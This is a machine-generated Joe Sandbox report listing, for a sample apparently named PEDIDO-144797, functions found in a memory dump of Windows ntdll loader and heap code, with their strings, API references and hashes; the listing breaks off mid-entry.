                                                                                                                                          Function 3274F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                          • API String ID: 3446177414-1745908468
                                                                                                                                          • Opcode ID: a95a49ea9b80a535c4b684c0a4dafd5cc0128dc7ca08e362dfa57bafdd40d9f1
                                                                                                                                          • Instruction ID: 89be3a8e08f4545add1c69a31f40f14e0c4969597a0df322abbed8d139c7e9ed
                                                                                                                                          • Opcode Fuzzy Hash: a95a49ea9b80a535c4b684c0a4dafd5cc0128dc7ca08e362dfa57bafdd40d9f1
                                                                                                                                          • Instruction Fuzzy Hash: C4910F35900745DFEB02CFA8C850AEEBBF2FF49318F14845AE854AB251CF7A9942CB55
                                                                                                                                          Function 3269640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 3269651C
                                                                                                                                            • Part of subcall function 32696565: RtlDebugPrintTimes.NTDLL ref: 32696614
                                                                                                                                            • Part of subcall function 32696565: RtlDebugPrintTimes.NTDLL ref: 3269665F
                                                                                                                                          Strings
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 326F97A0, 326F97C9
                                                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 326F977C
                                                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 326F97B9
                                                                                                                                          • LdrpInitShimEngine, xrefs: 326F9783, 326F9796, 326F97BF
                                                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 326F9790
                                                                                                                                          • apphelp.dll, xrefs: 32696446
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 3446177414-204845295
                                                                                                                                          • Opcode ID: ee3bfa53df810f0b9ba04ada32b0763197bc8f2f09ddf77d87ebb6223622dfa0
                                                                                                                                          • Instruction ID: a6f66e7e34cf70c67345833ee2080d459b6c49ea922abe9ead1ee8941ff27c84
                                                                                                                                          • Opcode Fuzzy Hash: ee3bfa53df810f0b9ba04ada32b0763197bc8f2f09ddf77d87ebb6223622dfa0
                                                                                                                                          • Instruction Fuzzy Hash: C651AE7164A340AFE724CF24C890F9B77E8FF84758F400919FA95AB2A0DE71D945CB92
                                                                                                                                          Function 3269D02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • @, xrefs: 3269D24F
                                                                                                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3269D06F
                                                                                                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3269D0E6
                                                                                                                                          • h.l2, xrefs: 326FA5D2
                                                                                                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 3269D136
                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3269D263
                                                                                                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3269D202
                                                                                                                                          • @, xrefs: 3269D2B3
                                                                                                                                          • @, xrefs: 3269D09D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.l2
                                                                                                                                          • API String ID: 0-2525076677
                                                                                                                                          • Opcode ID: 012c86559cd5ca1959f388bf1ae7d6f6af1d826ea72efa459e199b4cd83b078c
                                                                                                                                          • Instruction ID: 3d59df1f130f6c05025db64c315fd24fe568a83512106529398e381efa2b9eb2
                                                                                                                                          • Opcode Fuzzy Hash: 012c86559cd5ca1959f388bf1ae7d6f6af1d826ea72efa459e199b4cd83b078c
                                                                                                                                          • Instruction Fuzzy Hash: DAA17EB24083459FE721DF24C980B9BB7E8BF88755F00492EF98996241DB74C908CF93
                                                                                                                                          Function 326CD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 326CD879
                                                                                                                                            • Part of subcall function 326A4779: RtlDebugPrintTimes.NTDLL ref: 326A4817
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 3446177414-1975516107
                                                                                                                                          • Opcode ID: 0c7a0fcb353edef0c4a104d39434ab6c763b317f20ac1e0f1f10139ebe36fe27
                                                                                                                                          • Instruction ID: 41366e7c7cc42d171c635fc59f20505cfdee51c69ee0118af91cd2dd81fc4f1a
                                                                                                                                          • Opcode Fuzzy Hash: 0c7a0fcb353edef0c4a104d39434ab6c763b317f20ac1e0f1f10139ebe36fe27
                                                                                                                                          • Instruction Fuzzy Hash: C1512375A45395DFEB08DFA4C58478DBBF1FF44318F504069D800AB282DBB0A986CF90
                                                                                                                                          Function 32728633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 327286E7
                                                                                                                                          • VerifierFlags, xrefs: 327288D0
                                                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 3272880F
                                                                                                                                          • HandleTraces, xrefs: 3272890F
                                                                                                                                          • VerifierDebug, xrefs: 32728925
                                                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 327286BD
                                                                                                                                          • VerifierDlls, xrefs: 3272893D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                          • API String ID: 0-3223716464
                                                                                                                                          • Opcode ID: 93fa971036a4966ea2b12584316554163dd7fe05147cef759166417a81a8f71b
                                                                                                                                          • Instruction ID: 5852e9a086deeca830fb17b86fea90e7d9227813149ad8ffb219020dc6d3ec9d
                                                                                                                                          • Opcode Fuzzy Hash: 93fa971036a4966ea2b12584316554163dd7fe05147cef759166417a81a8f71b
                                                                                                                                          • Instruction Fuzzy Hash: E69112B1A42361EFE311CF689880B5A77A9FF44B54F450959F9807F350CB729C06CBA6
                                                                                                                                          Function 326C237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3270A7AF
                                                                                                                                          • DGg2, xrefs: 326C2382
                                                                                                                                          • LdrpDynamicShimModule, xrefs: 3270A7A5
                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3270A79F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: DGg2$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-1866695378
                                                                                                                                          • Opcode ID: 8208547195aec02d14c642f079388e3560e24e765131028747e02f52c045685d
                                                                                                                                          • Instruction ID: fef28806dfacb7fa1232ad11287bf3ae6653f35ca5eb5460fb2507c0718f30ff
                                                                                                                                          • Opcode Fuzzy Hash: 8208547195aec02d14c642f079388e3560e24e765131028747e02f52c045685d
                                                                                                                                          • Instruction Fuzzy Hash: 58310276A40341EBEB159F59C895E5A77F5FF80750F108469EA017B250DAB0A88BCF90
                                                                                                                                          Function 3269F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                          • API String ID: 0-523794902
                                                                                                                                          • Opcode ID: f7cc2714f641a28508cad06bdf149ad445e53bf18f8860b4d88b333bf792d804
                                                                                                                                          • Instruction ID: e5ae669468999632111e7e1164cb4e5d6aef778cc35114694fc371ce8fe02957
                                                                                                                                          • Opcode Fuzzy Hash: f7cc2714f641a28508cad06bdf149ad445e53bf18f8860b4d88b333bf792d804
                                                                                                                                          • Instruction Fuzzy Hash: D742F275208781AFD709CF28C480B9ABBE9FF85748F05496DE8858B352DF75E841CB92
                                                                                                                                          Function 326C510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.l2
                                                                                                                                          • API String ID: 0-2273862861
                                                                                                                                          • Opcode ID: b39788e11a1a531ed064d9ebc00b972e63c0393048eaf89e64d886428322abe7
                                                                                                                                          • Instruction ID: 8c178a88bae5b2c24be9c7338d5fd032711649b82495cbf76158dcdf5db81a06
                                                                                                                                          • Opcode Fuzzy Hash: b39788e11a1a531ed064d9ebc00b972e63c0393048eaf89e64d886428322abe7
                                                                                                                                          • Instruction Fuzzy Hash: 48F14AB6D01228EBDB15DF99C990ADEBBF8FF48754F50405AE501B7210EBB49E01CBA4
                                                                                                                                          Function 326BB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                          • API String ID: 0-122214566
                                                                                                                                          • Opcode ID: cbc48d3e18783a43e881608c7c14114fcecfa079f102c233e4ad769de811d9d4
                                                                                                                                          • Instruction ID: 469f740d32341c6c867f5f90b3fdc76265879fa9af2c96f25010d17d2e56c843
                                                                                                                                          • Opcode Fuzzy Hash: cbc48d3e18783a43e881608c7c14114fcecfa079f102c233e4ad769de811d9d4
                                                                                                                                          • Instruction Fuzzy Hash: 5BC10175A00315ABEF188B66C890BBFB7A5BF45714F54816DEC02AF290EBB0CD48C791
                                                                                                                                          Function 326D631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-792281065
                                                                                                                                          • Opcode ID: e17906d2db6514577da29180d66ecef3884843833f6fa8feb4784eb4000701bc
                                                                                                                                          • Instruction ID: 8d12289d90a7f1f1a4c65e8cc241f5a345889c13911c29c4158d189d3b7b8dde
                                                                                                                                          • Opcode Fuzzy Hash: e17906d2db6514577da29180d66ecef3884843833f6fa8feb4784eb4000701bc
                                                                                                                                          • Instruction Fuzzy Hash: 8F919970A42359DFFB28DF25D954B9A3BA1FF41768F000169E9157F280CBB0A842CBD5
                                                                                                                                          Function 326B0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                          • API String ID: 0-4253913091
                                                                                                                                          • Opcode ID: 0610329d4689079d9cae7cddeef4c5e751be7554e20fa2dfa36030d54995b4e9
                                                                                                                                          • Instruction ID: 8647a4c8a37264394255922f7e41777c7be4a9630ee7b2213feb594949320879
                                                                                                                                          • Opcode Fuzzy Hash: 0610329d4689079d9cae7cddeef4c5e751be7554e20fa2dfa36030d54995b4e9
                                                                                                                                          • Instruction Fuzzy Hash: AFF1BC74A04A05DFEB09CF69C894B6ABBF6FF45344F1481A8E8059B381DB70E985CF91
                                                                                                                                          Function 326C9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                          • API String ID: 3446177414-2283098728
                                                                                                                                          • Opcode ID: 7c97a3b45838db7c752025a4fcde71c90d0e40eef63977560497a285e204d504
                                                                                                                                          • Instruction ID: 23f37e61cb3444fd058f37733ba08d87e21b9c7c259ad5c0df256199e0fe0d91
                                                                                                                                          • Opcode Fuzzy Hash: 7c97a3b45838db7c752025a4fcde71c90d0e40eef63977560497a285e204d504
                                                                                                                                          • Instruction Fuzzy Hash: CA5123716077219BE718EF38C884B2A77A1FF84314F140A6DE8519B691DBB0E845CBA6
                                                                                                                                          Function 326DC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 327180F3
                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 327180E2
                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 327180E9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 3446177414-1783798831
                                                                                                                                          • Opcode ID: 1694558c58c405c6d58ec3da0dfbc177539a0f609825f7e1edc30ffc02af8713
                                                                                                                                          • Instruction ID: d927977129b54545c9bf55b2a36642cd28daa06c35a14f8b3eb3de4fce655d1a
                                                                                                                                          • Opcode Fuzzy Hash: 1694558c58c405c6d58ec3da0dfbc177539a0f609825f7e1edc30ffc02af8713
                                                                                                                                          • Instruction Fuzzy Hash: 0E4117B9541388ABE721EB25DC44F4B77E8FF44750F10492AF858E7250DB74E842CB96
                                                                                                                                          Function 327243D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • LdrpCheckRedirection, xrefs: 3272450F
                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32724508
                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 32724519
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                          • API String ID: 3446177414-3154609507
                                                                                                                                          • Opcode ID: 4ee6e8a7f08fe214348c17f550c998a81c63fb0cc14685d56721a5a5c0457c7b
                                                                                                                                          • Instruction ID: 9664666d44a53158c052ad0f90b2b10089d9df511db2dc806525c40a346c4320
                                                                                                                                          • Opcode Fuzzy Hash: 4ee6e8a7f08fe214348c17f550c998a81c63fb0cc14685d56721a5a5c0457c7b
                                                                                                                                          • Instruction Fuzzy Hash: 514103766053119FDB21CF68C860A1677E6FF48794F060659EC88EF351DB31E801CB81
                                                                                                                                          Function 32697662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                          • API String ID: 0-3061284088
                                                                                                                                          • Opcode ID: 21e0fd0ddb521ac5ae22f1c7b9121a163131cbf4e17026a64aa5d7b4b97086f4
                                                                                                                                          • Instruction ID: 0f517cf52bdf24828157c861e99a2806bfa9847e8bd806932b83a1087c4e25d5
                                                                                                                                          • Opcode Fuzzy Hash: 21e0fd0ddb521ac5ae22f1c7b9121a163131cbf4e17026a64aa5d7b4b97086f4
                                                                                                                                          • Instruction Fuzzy Hash: E301FC77029280AEE709C72CE819FC277A8EF42F75F19449DE40047591DEB69C40D555
                                                                                                                                          Function 326AA2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                          • API String ID: 0-379654539
                                                                                                                                          • Opcode ID: 5be8f1f75a4b4e0847f03a813ab665b400870b398f5c212564fa8c6b0cc2468f
                                                                                                                                          • Instruction ID: 6e156d5dbe18fb104892fa136ecfdb37bebbdcad2a64bb657a5ba22ca2133d63
                                                                                                                                          • Opcode Fuzzy Hash: 5be8f1f75a4b4e0847f03a813ab665b400870b398f5c212564fa8c6b0cc2468f
                                                                                                                                          • Instruction Fuzzy Hash: C4C176B51083828FE319CF19C950B5AB7F4FF85748F00886AF8858B250EB74CD4ACB66
                                                                                                                                          Function 326D8322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 326D8341
                                                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 326D847E
                                                                                                                                          • @, xrefs: 326D84B1
                                                                                                                                          • LdrpInitializeProcess, xrefs: 326D8342
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-1918872054
                                                                                                                                          • Opcode ID: 1fdb5a7b51be8e7b953e792807c97c37b1451cf2109be3ae82e17cff1b3cb651
                                                                                                                                          • Instruction ID: e7dcd980845f9deb6ccb39fa68841f7caccdd568675d863d252a6816c0eb70d7
                                                                                                                                          • Opcode Fuzzy Hash: 1fdb5a7b51be8e7b953e792807c97c37b1451cf2109be3ae82e17cff1b3cb651
                                                                                                                                          • Instruction Fuzzy Hash: 9591EC71509388AFE721CE21D944FABB7ECFF84784F40082EFA8992150E774E945CB66
                                                                                                                                          Function 326D265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • .Local, xrefs: 326D27F8
                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 327120C0
                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 32711FE8
